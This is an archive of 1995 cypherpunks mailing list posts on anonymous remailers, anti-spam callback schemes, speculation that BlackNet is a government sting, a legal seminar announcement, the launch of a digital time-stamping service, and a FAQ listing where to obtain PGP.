digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From carolb at barton.spring.com Thu Jan 19 01:25:07 1995 From: carolb at barton.spring.com (Censored Girls Anonymous) Date: Thu, 19 Jan 95 01:25:07 PST Subject: remailer security In-Reply-To: Message-ID: Sorry I'm a tad late. This time I got axed for just two groups. C2.orgs WWW page doesn't, but only sameer knows for sure. And you might have fun looking at the "I thought you should see it first", in news.admin.policy Feel free to post it anywhere you like as anonymously as you like. There are lots CP ref's in it, and and if I don't do the reposting, I can't get in trouble. Now I've got to catch up reading & fixing WWW pages, and I'll link every WWW ref I see on this list in a dy or two. Thanks, Carol Anne RegisteredBEllcore Trusted Software Integrity system programmer *********************************************************************** Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..." The TS NET REVOKED PGP KEY NO.0C91594D carolb at spring.com http://www.c2.org/~carolann carolann at c2.org ************************************************************************ COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM On Tue, 17 Jan 1995, Mats Bergstrom wrote: > multiple chaining for the lazy, though: C2 lets you pick the chained > sites by clicking on a web-page (but does it encrypt??). > > Mats From craig at passport.ca Thu Jan 19 01:48:32 1995 From: craig at passport.ca (Craig Hubley) Date: Thu, 19 Jan 95 01:48:32 PST Subject: FBI and BLACKNET In-Reply-To: Message-ID: > On Tue, 17 Jan 1995, Craig Hubley (I) wrote: > > > Regarding BlackNet, I am not sure that they are not *run* by the FBI, > > or NSA, or CIA, MI6, Interpol, or some more mysterious quasi-governmental > > entity. > > The more I think about it the more this theory makes sense. I know > how they _could_ have traced me but this doesn't explain all their other > "leads" they are following up on and he seemed to imply there were many. > > >>> Not to mention entrapment is their MO. <<< > > What do you say we put the word out? Mixed feelings. On the one hand, I am starting to believe in this theory more and more. On the other hand, I think that having a BlackNet run by security agencies is actually a stabilizing thing to some degree: those who are foolish enough to deal with unknown parties with unknown interests in arbitrary secrets with petty motives will generally become neutralized. For instance, those who sell 2000 credit card numbers or 500 broken Digital Cash Card readouts (is this possible) can be paid or prosecuted at leisure. In either case, such folks will find more and more security holes plugged as they clearly identify where they are for the security agencies... this would prevent a general crackdown on cryptography etc., effectively the security agencies would have learned to work 'within the new realities'. I suspect targets might be less likely to be chosen by police discretion, and more likely to be chosen for their threat value, if they required less (discretionary) effort to investigate in the first place. Note that some laws, like small scale marijuana growing, often go unenforced unless there is a specific complaint or hard evidence is directly presented to police. In the 'BlackNet sting', such a flow of evidence would be constantly on its way in to the police, probably forcing them into more of a reactive mode, and definitely focusing their attention on those actively peddling secrets as opposed to those just trying to keep them. Not too bad for privacy. Furthermore, the flow of truly scary secrets flowing their way might make them ration their effort to plug leaks of high priority: nuclear weapon design, biological warfare blueprints, formulae for putting necrotizing fascitis into the common cold protein coat, 'gray goo' nanotechnology... and other things that constitute serious threats to life on this planet. This might probably divert effort away from prosecuting 'victimless crime', enhancing civil liberties. For once such agencies might be 'doing their job'. If indeed they have any legitimate job, which is always up for debate. Of course they will also engage in petty prosecution of those who they perceive are acting against their narrow interests, but all organisms act to preserve and advance themselves... this comes and goes with their leaders (J. Edgar Hoover, William Casey come to mind as good/bad examples) who hopefully turn over with the tide of politics, minimizing the abuses in the long run. Of course this is little consolation to those they target. Systematic abuses might be more easily revealed by 'whistleblowers' if there were a clear record kept 'inside' of which leads were followed and which not. Blow the whistle? Sure, we could. But what difference does it make? If no one trusts BlackNets, then the security agencies just take a different route to building up credibility for a 'sting', using more private means, or many such more private means, and again we increase their discretionary powers as they decide where to devote effort to building up a reputation (hmm do we target Columbian druglords? biohackers? breakaway republics? cryptographers?) and thereby where to concentrate enforcement. Perhaps by blowing a whistle on a 'BlackNet sting' we simply force them to evolve to more devious methods, that require more planning, and costs more (thus maybe reducing their overall activity - although history says otherwise) but in the long run is even more directed by the interest/prejudice of leaders. It may be that the simpler and more reactive the methods they apply, the better. It is largely premeditated human scheming that starts wars, isn't it? Not simple knee jerks. Perhaps others believe otherwise, but not really an issue for debate in cypherpunks. Perhaps it is better to co-opt agencies by giving them a reason to adopt the cryptographer's agenda. It's got to be cheaper and easier for them to sit and buy secrets than it is to go out and dig them up themselves... and cryptography generally advances that capability as folks feel safe using it to transmit secrets electronically. Of course the idea that black nets must be a sting is speculation, but it would hardly be the first time that security agencies and those that they officially target had developed a symbiotic relationship. Here in Canada it was recently revealed that CSIS (the 'Canadian CIA') had been actively involved in the founding of the Heritage Front, a neo-Nazi group. In fact one of their leaders was an agent! Interestingly, this appears to be a more effective/cheaper way to control a large group of otherwise dangerous people - if they want to follow a leader, let them! Just make sure the leader is someone you control and you can prevent things from getting too far out of hand. Which is the only time that CSIS or the CIA should be stepping in anyway. It is sort of a pre-emptive strike and not at all 'politically correct' in a liberal democracy, but they do it anyway. That's life. And maybe it's easier to keep an eye on simple forms of life. Craig Hubley Business that runs on knowledge Craig Hubley & Associates needs software that runs on the Web craig at passport.ca 416-778-6136 416-778-1965 FAX From rparratt at london.micrognosis.com Thu Jan 19 02:12:54 1995 From: rparratt at london.micrognosis.com (Richard Parratt) Date: Thu, 19 Jan 95 02:12:54 PST Subject: Internet, spamming, etc. Message-ID: <9501191012.AA04837@pero> > From owner-cypherpunks at toad.com Wed Jan 18 17:00:14 1995 > Date: Wed, 18 Jan 1995 07:54:00 -0800 > I also think this is the one great flaw in the design of the Internet; > namely, that the sender has all the control over what packets flow > over the net. A receiver can ask for a slowdown or cessation, but > there's no obligation to do so. This will be, if anything, the > limiting factor in scalability of the internet. In theory, yes. However, almost all Internet protocols are TCP/IP based. The receiver of a TCP connection can choose not to accept the connection, or to drop it at any time. The window protocol keeps the sender from transmitting faster than any part of the connection can manage. (How do you think ftp transfers between sites with disparate connection speeds would work otherwise?) One could theoretically have a package that sprayed UDP packets at a particular IP address, or even have a modified TCP that ignored disconnects. I think most service providers would regard using such code as being on a par with running a program that tried to telnet sequentially to all known IP addresses, trying common passwords on each. -- Richard Parratt From lmccarth at ducie.cs.umass.edu Thu Jan 19 02:30:36 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Thu, 19 Jan 95 02:30:36 PST Subject: Anti-Spam Methods Message-ID: <199501191035.FAA07879@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Nathan Zook writes: > Ivan Boskey? (sp) "Boesky" [...] > We are capable of controlling mail bombs, for instance, in the > following way: > > Take an incoming message, capture From: line. Strip header. MD5 body. > Add to sorted table [From: MD5(message) date]. Check for repetition of > first two fields. If reps = 1, forward message. If reps = 2, send message > to From: "Possible error. Two copies of message received." We were just discussing this on the remailer operators' list. Homer was mulling over sending an automatic acknowledgement of each article submitted for anon posting. I pointed out that From: lines (and even From lines) are notoriously unreliable. For example, in the Scythe spam, the articles were ostensibly from various people @crl.com. Autoacks might have raised the ire of plenty of people, but wouldn't have reached the real perpetrator. > If reps = 0 mod 5, send letter to postmaster at From:. "Possible mailbomb or > spam. copies of received from at your site in the > past week." Clear table of entries more than a week old every midnight. This would necessitate keeping full logs of all traffic passing through the remailer for up to a week. Speaking only for myself, I can't imagine adopting such a remailer policy. YMMV. > If all remailers did this, then no matter where the net was entered, > the messages would be rejected. And spammers/bombers would be spamming/ > bombing their own postmaster. Again, in a forged-spam case like Scythe, the spammers/bombers would be inducing the remailers to spam/bomb some arbitrary postmasters -- perhaps even the remailers' postmasters -- as a side effect. A "call-back" scheme might, however, be used to verify an originator's address. In this scheme, when a remailer receives a message for remailing, it generates a few lines of random garbage and associates them with the message. These lines are sent, along with a hash of the original message, in a brief ack message to the address in the From: line of the message. The headers of the message are discarded. When the remailer receives a message with a Callback: header, it checks the reply against the table associated with the current message pool. If a match is found, the associated message is marked ready for remailing. After a fairly short period, a message which still hasn't been marked for remailing is deleted. With chaining, more record-keeping by the remailers would be needed. The remailers can't automatically honor all callbacks from other remailers, because wise forgers would simply forge their mail so it appeared to originate from some known remailer address. So each remailer would need to keep (for a brief period) a hash of each message it remails, in order to decide which callback queries to answer. A list of current remailers could be used to winnow out messages which are not being remailed to other remailers, and hence need not be hashed and kept. This protocol would aid a remailer operator who decided to trace a spam in progress, because it should prevent spammers from forging their messages. Couple this with mandatory appending of encrypted reply blocks, and the release valve of two-way communication might be opened. Legal proceedings obviously can't be brought successfully against anonymous parties, so achieving common carrier status is about the only antidote to that problem I can foresee at the moment. I'm thinking about working on code to implement some of this stuff in existing remailer software, so I'm especially interested in hearing objections, flames, suggestions, encouragement, etc. about it. I've spent a while contemplating the wants and needs of prospective benign remailer users -- market research, if you will. At this point, I think patching together various pieces of existing remailer technology might greatly improve the attractiveness of the c'punks style remailers. -L. Futplex McCarthy; PGP key by finger or server "The objective is for us to get those conversations whether they're by an alligator clip or ones and zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLx4/Tmf7YYibNzjpAQGcHgP+Nmo+c/Cfdul7HsZGOXR+cP+rmAVP1tRB 6PZcm/PDycd9HBTYqhraPsmwn7OGbqnWTeF0O5AitGSnwdG5o8+sSdUJ+KfJ1AcQ tcyBFlvk9Rh/UIuzksUOeY935CVMA0nEmiXLoyJnnpiRoThctd/yILd8V+qiQ1pK 46j6Y7WeK5E= =vUEc - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLx5AZCoZzwIn1bdtAQE70wF/dta1dAuc7yWpkqkK2asa+9V/H3zN/cPI vGyOSZMIvRCcAGLgSCUwZes+e3l7ETnZ =2HOy -----END PGP SIGNATURE----- From rah at shipwright.com Thu Jan 19 03:25:14 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 19 Jan 95 03:25:14 PST Subject: Law of Electronic Commerce -- seminar announcement Message-ID: FWIW, Bob Hettinga >From: nsb at radiomail.net >Date: Wed, 18 Jan 1995 14:16:54 -0800 >To: inet-marketing at einet.net, www-buyinfo at allegra.att.com, > edi-new at tegsun.harvard.edu, ietf-edi at byu.edu >Original-From: "NSB's Portable (via RadioMail)" >Subject: Law of Electronic Commerce -- seminar announcement >Reply-To: Nathaniel Borenstein (via RadioMail) > >To help educate business professionals about electronic commerce, >First Virtual (TM) Holdings Incorporated is pleased to lend promotional >support to: > > Law of Electronic Commerce > On-line Seminar > Starting January 30, March 13, and May 9, 1995 > Future Dates to Be Announced > >The National Computer Security Association announces a new form of >professional education -- an on-line seminar. It is education >delivered through the NCSA InfoSecurity Forum on CompuServe. >(Internet delivery is also available.) For 30 days, attorney >Benjamin Wright will convene a seminar covering The Law of >Electronic Commerce -- EDI and E-mail Contracts and Records. > >Participants will attend the seminar by exchanging computer >messages with Wright in a private discussion forum. Thus, no one >will have to travel or miss time away from the office or home. > >The seminar is designed for security managers, Online and MIS >professionals, EDI managers, purchasing managers who use EDI and E- >mail, lawyers, accountants and auditors. Topics on the agenda: > >1. Electronic Contracts >2. Electronic Data Interchange (EDI) and Electronic Funds Transfer >3. Electronic Signatures >4. EDI Trading Partner Agreements >5. Value-Added Network Agreements >6. Electronic & Optical Evidence >7. EDI & Optical Tax Records >8. UCC Article 4A >9. Electronic Healthcare Data >10. E-mail Privacy > >Tuition is $350 for NCSA members and $395 for non-members. (Group >discounts are available.) > >The starting dates for the next three sessions of the seminar are >January 30, March 13, and May 9, 1995. > >Special Guest Lecturers: > > Nathaniel Borenstein, Chief Scientist, > First Virtual Holdings Incorporated > > Richard K. Crone of KPMG Peat Marwick LLP, > electronic banking expert > >Views expressed in the seminar are those of the individuals expressing >them and not necessarily those of sponsors, employers or anyone else. > >To register on-line, or for more information and a free brochure, point >your browser at the following URL: > >http://www.infohaus.com/sponsored/ncsa-seminar.html > >Or write to: > >National Computer Security Association >10 South Courthouse Ave. >Carlisle, PA 17013 >Tel: (800) 488-4595 >Tel: (717) 258-1816 >Fax: (717) 243-8642 >bwrigh01 at reach.com > > (This Notice May Be Distributed Freely) ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From entropy at IntNet.net Thu Jan 19 03:41:25 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Thu, 19 Jan 95 03:41:25 PST Subject: Internet, spamming, etc. In-Reply-To: <9501191012.AA04837@pero> Message-ID: > One could theoretically have a package that sprayed UDP packets > at a particular IP address, or even have a modified TCP > that ignored disconnects. I think most service providers > would regard using such code as being on a par with running > a program that tried to telnet sequentially to all known IP > addresses, trying common passwords on each. Code exists to do all of the things that you've mentioned. That was the original point of the discussion. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From rparratt at london.micrognosis.com Thu Jan 19 03:51:53 1995 From: rparratt at london.micrognosis.com (Richard Parratt) Date: Thu, 19 Jan 95 03:51:53 PST Subject: Internet, spamming, etc. Message-ID: <9501191151.AA04857@pero> > > One could theoretically have a package that sprayed UDP packets > > at a particular IP address, or even have a modified TCP > > that ignored disconnects. I think most service providers > > would regard using such code as being on a par with running > > a program that tried to telnet sequentially to all known IP > > addresses, trying common passwords on each. > > Code exists to do all of the things that you've mentioned. > > That was the original point of the discussion. No doubt it does. But my assertion is that most service providers would cut you off if you tried running such code, especially the latter case. -- Richard Parratt From habs at cmyk.warwick.com Thu Jan 19 06:38:47 1995 From: habs at cmyk.warwick.com (Harry S. Hawk) Date: Thu, 19 Jan 95 06:38:47 PST Subject: Lance Rose writes anti-cryptoanarchy in WIRED In-Reply-To: <199501190459.UAA26969@netcom12.netcom.com> Message-ID: <9501191738.AA23269@cmyk.warwick.com> Lance Rose is a good guy... IMHO.. 1) I use his legal services 2) I haven't read the article but it seems reasonable esp. if we don't have NON-Escrowed encyptions... e.g., if clipper wins I think Lance is probally correct... 3) he can be reached at 72230.2044 at compuserve.com From perry at imsi.com Thu Jan 19 06:41:35 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 19 Jan 95 06:41:35 PST Subject: Lance Rose writes anti-cryptoanarchy in WIRED In-Reply-To: <199501190404.UAA24779@netcom6.netcom.com> Message-ID: <9501191441.AA03662@snark.imsi.com> Timothy C. May says: > Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer" > (?). When I met him a couple of years ago, he'd just gotten out of > jail and was working for the satellite Usenet distribution company > (whose name I don't recall, and who I've heard less of than I might've > expected to, subjunctively speaking). Don't confuse Len Rose and Lance Rose. One is indeed a lawyer -- in fact, he's my lawyer. Perry Who notes that he's not the only person shooting from the hip these days. From stuart at surety.com Thu Jan 19 07:10:45 1995 From: stuart at surety.com (Stuart Haber) Date: Thu, 19 Jan 95 07:10:45 PST Subject: Surety Technologies announces: Digital Notary System is on-line Message-ID: <9501191509.AA00167@surety.com> Many readers of this list have heard about the work that Scott Stornetta and I have done, beginning as Bellcore researchers a few years ago, on the problem of cryptographically secure digital time-stamping. In 1993 Bellcore spun off a company in order to commercialize this work. The company is called Surety Technologies, and we call our product and service the Digital Notary(tm) System. I am happy to report that we have just launched the product. To read about it, as well as to get the software, please visit our World-Wide Web home page: http://www.surety.com You can get the software and installation instructions directly by anonymous ftp to ftp.surety.com in the directory /dns/windows. Scott and I would both like to thank those readers of the list who have offered us their support, encouragement, and advice over the years. Stuart Haber | Surety Technologies provides Chief Scientist | the Digital Notary(tm) System. Surety Technologies, Inc. | General info: info at surety.com stuart at surety.com | (201) 701-0600, fax -0601 From mpj at netcom.com Thu Jan 19 07:18:01 1995 From: mpj at netcom.com (Michael Paul Johnson) Date: Thu, 19 Jan 95 07:18:01 PST Subject: Where to Get PGP FAQ Message-ID: -----BEGIN PGP SIGNED MESSAGE----- ===============================BEGIN SIGNED TEXT============================= WHERE TO GET THE PRETTY GOOD PRIVACY PROGRAM (PGP) (Last modified: 17 January 1995 by Mike Johnson) WHAT IS THE LATEST VERSION? |-----------------+---------------------+---------------------------------| | Platform(s) | Latest Version | Distribution File Names | |-----------------+---------------------+---------------------------------| | DOS, Unix, | Viacrypt PGP 2.7 | disk sets | | Mac, Windows, | | | | or WinCIM/CSNav | | | |-----------------+---------------------+---------------------------------| | DOS, Unix, | MIT PGP 2.6.2 | pgp262.zip (DOS + docs) | | others | | pgp262s.zip (source) | | | | pg262s.zip source on CompuServe | | | | pgp262.tar.gz (source) | | | | pgp262.gz (same as above on DOS)| | | | pgp262.tar.Z (source) | | | | pgp262dc.zip (documentation) | | | | pg262d.zip (docs on CompuServe) | |-----------------+---------------------+---------------------------------| | Macintosh | MIT PGP 2.6 | MacPGP2.6.sea.hqx (binary+docs) | | | | macpgp26.hqx (same as above) | | | | MacPGP2.6.src.sea.hqx (source) | | | | macpgp26.src (same as above) | | | | MacPGP2.6-68000.sea.hqx (binary)| | | | mcpgp268.hqx (same as above) | |-----------------+---------------------+---------------------------------| | Mac Applescript | MacPGP 2.6ui v 1.2 | MacPGP-2.6ui-v1.2.sit.hqx | | | + some beta versions| MacPGP2.6ui_V1.2_sources.cpt.hqx| | | based on MIT PGP | MacPGP2.6uiV1.2en.cpt.hqx | | | 2.6.2 | MacPGP2.6uiV1.2src.cpt.hqx | | | | MacPGP2.6uiV1.2.68000.hqx | | | | MacPGP2.6.2.beta*.sea.hqx | | | | MacPGP2.6.2.beta*.src.sea.hqx | |-----------------+---------------------+---------------------------------| | Amiga | PGP 2.6.2 Amiga 1.4 | pgp262-a14-000.lha | | | | pgp262-a14-020.lha | | | | pgp262-a14-src.lha | |-----------------+---------------------+---------------------------------| | Atari | Atari PGP 2.6.1 | pgp261st.zip | | | | pgp261b.lzh | |-----------------+---------------------+---------------------------------| | Non-USA version | PGP 2.6.i from | pgp26i.zip | | to avoid RSAREF | Stale Schumacher | pgp26is.zip | | license. | | pgp26is.tar.gz | |_________________|_____________________|_________________________________| PGP BOOKS Protect Your Privacy: PGP: Pretty Good Privacy A Guide for PGP Users by William Stallings by Simson Garfinkel Prentice Hall PTR O'Reilly & Associates, Inc. ISBN 0-13-185596-4 ISBN 1-56592-098-8 US $19.95 US $24.95 If you order Stallings' book from National Computer Security Association (74774.1326 at compuserve.com) they will donate $1 of the price to Phil Zimmermann's legal defense fund. WHERE CAN I GET THE PGP VERSION DIRECTLY FROM PHILIP ZIMMERMANN? Get the MIT version. See http://web.mit.edu/network/pgp-form.html WHAT IS PGP 2.6.i? Stale Schumacher released an international version of PGP built the "right way." By "right way," I mean that it uses the latest MIT code, but uses a different rsaglue.c to use the mpilib instead of RSAREF for RSA calculations, thus including all the latest bug fixes and features in the main freeware PGP code line, but frees non-USA persons from the limitations of the RSAREF license. This release has been as strongly endorsed by Philip Zimmermann as he can do without incriminating himself. Naturally, by not using the RSAREF code for RSA calculations, this version is not legal for use in the USA (other than limited research, etc.), but is fine anywhere else (like Canada) were RSA patents don't hold. Note that the latest version of Stale Schumacher's PGP is 2.6.i, 2.6i (without the second .) was a beta test version that has been superceded. WHAT IS PGP 2.6ui? The "unofficial international" versions are really just PGP 2.3a, modified just enough to make it compatible with MIT PGP 2.6, but do not include all of the fixes in MIT PGP 2.6 and MIT PGP 2.6.1. They have a "ui" somewhere in their file names. WHERE CAN I GET VIACRYPT PGP? Contact Viacrypt in Phoenix, Arizona, USA. The commecial version of PGP is fully licensed to use the patented RSA and IDEA encryption algorithms in commercial and government environments in the USA and Canada. It is fully compatible with, functionally the same as, and just as strong as the freeware version of PGP. Due to limitations on ViaCrypt's RSA distribution license, ViaCrypt only distributes executable code and documentation for it, but they are working on making PGP available for a variety of platforms. Call or write to them for the latest information. The latest version number for Viacrypt PGP is 2.7. Here is a brief summary of Viacrypt's currently-available products: 1. ViaCrypt PGP for MS-DOS. Prices start at $99.98 2. ViaCrypt PGP for UNIX. Includes executables for the following platforms: SunOS 4.1.x (SPARC) IBM RS/6000 AIX HP 9000 Series 700/800 UX SCO 386/486 UNIX SGI IRIX AViiON DG-UX(88/OPEN) Prices start at $149.98 Executables for the following additional platforms are available upon request for an additional $30.00 charge. BSD 386 Ultrix MIPS DECstation 4.x 3. ViaCrypt PGP for WinCIM/CSNav. A special package for users of CompuServe. Prices start at $119.98 Please contact ViaCrypt for quantity discount pricing. Orders may be placed by calling 800-536-2664 during the hours of 8:30am to 5:00pm MST, Monday - Friday. They accept VISA, MasterCard, AMEX and Discover credit cards. If you have further questions, please feel free to contact: Paul E. Uhlhorn Director of Marketing, ViaCrypt Products Mail: 9033 N. 24th Avenue Suite 7 Phoenix AZ 85021-2847 Phone: (602) 944-0773 Fax: (602) 943-2601 Internet: viacrypt at acm.org Compuserve: 70304.41 WHERE CAN I GET THE FREEWARE PGP? These listings are subject to change without notice. If you find that PGP has been removed from any of these sites, please let me know so that I can update this list. Likewise, if you find PGP on a good site elsewhere (especially on any BBS that allows first time callers to access PGP for free), please let me know so that I can update this list. Because this list changes frequently, I have not attempted to keep it complete, but there should be enough pointers to let you easily find PGP. There are several ways to get the freeware PGP: ftp, WWW, BBS, CompuServe, email ftp server, and sneakernet (ask a friend for a copy). Just don't ask Philip Zimmermann directly for a copy. FTP SITES IN NORTH AMERICA There are some wierd hoops to jump through, thanks to the U. S. Department of State, at many of these sites. This is apparently because the U. S. Department of State wants to make it easier for people outside of North America to develop, distribute, use, or sell strong cryptographic software than people inside of the USA and Canada -- at least that is the effect of their rules. Telnet to net-dist.mit.edu, log in as getpgp, answer the questions, then ftp to net-dist.mit.edu and change to the hidden directory named in the telnet session to get your own copy. MIT-PGP is for U. S. and Canadian use only, but MIT is only distributing it within the USA (due to some archaic export control laws). You can also get PGP from: ftp.csn.net/mpj See ftp://ftp.csn.net/mpj/README.MPJ ftp.netcom.com/pub/mp/mpj See ftp://ftp.netcom.com/pub/mp/mpj/README.MPJ ftp.netcom.com/pub/gr/grady/PGP (U. S. and Canada only). ftp.eff.org Follow the instructions found in README.Dist that you get from one of: ftp://ftp.eff.org/pub/Net_info/Tools/Crypto/README.Dist gopher.eff.org, 1/Net_info/Tools/Crypto gopher://gopher.eff.org/11/Net_info/Tools/Crypto http://www.eff.org/pub/Net_info/Tools/Crypto/ ftp.csua.berkeley.edu (for U. S. or Canadian users) /pub/cypherpunks/pgp/ ftp.gibbon.com /pub/pgp/README.PGP (OS/2 users see also /pub/gcp/gcppgp10.zip) ftp.wimsey.bc.ca /pub/crypto/software/dist/README WORLD WIDE WEB ACCESS http://web.mit.edu/network/pgp-form.html http://www.ifi.uio.no/~staalesc/PGPVersions.html http://www.mantis.co.uk/pgp/pgp.html http://rschp2.anu.edu.au:8080/crypt.html http://www.eff.org/pub/Net_info/Tools/Crypto/ http://community.net/community/all/home/solano/sbaldwin http://www.cco.caltech.edu/~rknop/amiga_pgp26.html COMPUSERVE GO NCSAFORUM. Follow the instructions there to gain access to Library 12: Export Controlled. PGP may be other places, too. Compuserve file names are even more limited than DOS (6.3 instead of the already lame 8.3), so the file names to look for are PGP262.ZIP, PG262S.ZIP (source code), PGP262.GZ (Unix source code) and PG262D.ZIP (documentation only). BULLETIN BOARD SYSTEMS Colorado Catacombs BBS Mike Johnson, sysop Mac and DOS versions of PGP, PGP shells, and some other crypto stuff. Also the home of some good Bible search files and some shareware written by Mike Johnson, including ATBASH, DLOCK, CRYPTA, CRYPTE, CRYPTMPJ, MCP, MDIR, DELETE, PROVERB, SPLIT, ONEPAD, QUICRYPT, etc. v.FAST/v.32bis/v.42bis, speeds up to 28,800 bps 8 data bits, 1 stop, no parity, as fast as your modem will go. Use ANSI terminal emulation, or if you can't, try VT-100. Free access to PGP. If busy or no answer, try again later. For free access: log in with your own name, answer the questions, then select [Q]uestionaire 3 from the [M]ain menu. (303) 772-1062 Longmont, Colorado number - 2 lines. (303) 938-9654 Boulder, Colorado number forwarded to Longmont number intended for use by people in the Denver, Colorado area. The Freedom Files BBS, DeLand Florida, USA 904-738-2691 Exec-Net, New York, NY, USA (Host BBS for the ILink net) 914-667-4567 The Ferret BBS (North Little Rock, Arkansas) (501) 791-0124 also (501) 791-0125 Special PGP users account: login name: PGP USER password: PGP CVRC BBS 317-791-9617 CyberGold BBS 601-582-5748 Self-Governor Information Resource, 915-587-7888, El Paso, Texas, USA In the UK, try 01273-688888 MAUS BBS (+49 781 38807) Offenburg, Germany - angeschlossen an das MausNet OTHER FTP SITES ftp.informatik.uni-hamburg.de /pub/virus/crypt/pgp This site has most, if not all, of the current PGP files. ftp.leo.org /pub/com/os/os2/crypt ftp.ox.ac.uk (163.1.2.4) /pub/crypto/pgp This is a well organized site with most of the current PGP files as well as shells and mailer scripts. ftp.netcom.com /pub/dc/dcosenza -- Some crypto stuff, sometimes includes PGP. unix.hensa.ac.uk /pub/uunet/pub/security/virus/crypt/pgp ftp.ee.und.ac.za /pub/crypto/pgp ftp.csua.berkeley.edu /pub/cypherpunks/pgp (DOS, MAC) ftp.demon.co.uk /pub/amiga/pgp /pub/archimedes /pub/pgp /pub/mac/MacPGP ftp.informatik.tu-muenchen.de ftp.funet.fi ftp.dsi.unimi.it /pub/security/crypt/PGP atari.archive.umich.edu /pub/atari/Utilities/pgp261st.zip (Atari) ftp.tu-clausthal.de (139.174.2.10) (Atari ST/E,TT,Falcon) /pub/atari/misc/pgp/pgp261b.lzh wuarchive.wustl.edu /pub/aminet/util/crypt src.doc.ic.ac.uk (Amiga) /aminet /amiga-boing ftp.informatik.tu-muenchen.de /pub/comp/os/os2/crypt/pgp23os2A.zip (OS/2) iswuarchive.wustl.edu pub/aminet/util/crypt (Amiga) nic.funet.fi (128.214.6.100) /pub/crypt ftp.uni-kl.de (131.246.9.95) /pub/aminet/util/crypt qiclab.scn.rain.com (147.28.0.97) pc.usl.edu (130.70.40.3) leif.thep.lu.se (130.235.92.55) goya.dit.upm.es (138.4.2.2) tupac-amaru.informatik.rwth-aachen.de (137.226.112.31) ftp.etsu.edu (192.43.199.20) pencil.cs.missouri.edu (128.206.100.207) ftp.csua.berkeley.edu kauri.vuw.ac.nz nctuccca.edu.tw /PC/wuarchive/pgp/ ftp.fu-berlin.de:/mac/sys/init/MacPGP2.6uiV1.2en.cpt.hqx.gz Also, try an archie search for PGP. FTPMAIL For those individuals who do not have access to FTP, but do have access to e-mail, you can get FTP files mailed to you. For information on this service, send a message saying "help" to ftpmail at decwrl.dec.com. Another e-mail service is from nic.funet.fi. Send mail to mailserv at nic.funet.fi with the word HELP. For the ftp sites on netcom, send mail to ftp-request at netcom.com containing the word HELP in the body of the message. To get pgp 2.6.i by email: Send a message to hypnotech-request at ifi.uio.no with your request in the Subject: field. Subject What you will get GET pgp26i.zip MS-DOS executable (uuencoded) GET pgp26is.zip MS-DOS source code (uuencoded) GET pgp26is.tar.gz UNIX source code (uuencoded) For FAQ information, send e-mail to mail-server at rtfm.mit.edu with send usenet/news.answers/ftp-list/faq in the body of the message. MACPGP OPTIONS There are multiple parallel efforts to write an up-to-date MacPGP. See the following for the latest MacPGP beta stuff. Zbigniew Fiedorowicz has updated his MacPGP to support Apple events, and his distribution comes with complete source code. Grady's netcom directory contains a different version, about which he says "This latest bug release beta 1.23 fixes several relatively minor bugs. Source to this version is NOT available, so its use should be restricted to experimentation only." ftp://ftp.csn.net/mpj/README.MPJ ftp://ataxia.res.wpi.edu/pub/mac-pgp/README ftp://highway.alinc.com/users/jordyn/mac-pgp/README ftp://ftp.netcom.com/pub/gr/grady/PGP/MacPGP262b1.23.seq.hqx.asc PGP FOR WINDOWS, WINDOWS NT, AND WINDOWS 95 There isn't one, yet, that I know of (at least not a true native Windows application). There are several good shells that call the DOS PGP for the actual work, though. I use Viacrypt's, but there are others available as shareware or freeware at most of the sites listed above for PGP itself. IS MY COPY OF PGP GOOD? If you find a version of the PGP package that does not include the PGP User's Guide, something is wrong. The manual should always be included in the package. PGP should be signed by one of the developers (Philip Zimmermann, Jeff Schiller, Viacrypt, Stale Schumacher, etc.). OTHER PGP DOCUMENTATION For more information on the "time bomb" in PGP, see ftp://ftp.csn.net/mpj/pgpbomb.asc More PGP details are at http://www.pegasus.esprit.ec.org/people/arne/pgp.html Windows shells documentation http://www.LCS.com/winpgp.html Watch for the full PGP FAQ on alt.security.pgp. LANGUAGE MODULES These are suitable for most PGP versions. I am not aware of any export/import restrictions on these files. German * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_german.txt * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp_german.txt * _US:_ ftp://ftp.csn.net/mpj/public/pgp/PGP_german_docs.lha Italian * _IT:_ ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.italian.tar.gz * _FI:_ ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/PGP/pgp-lang.italian.tar.gz * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.italian.tar.gz Japanese * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_japanese.tar.gz * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-msgs-japanese.tar.gz Lithuanian * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_lithuanian.zip * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp23ltk.zip Russian * _UK:_ 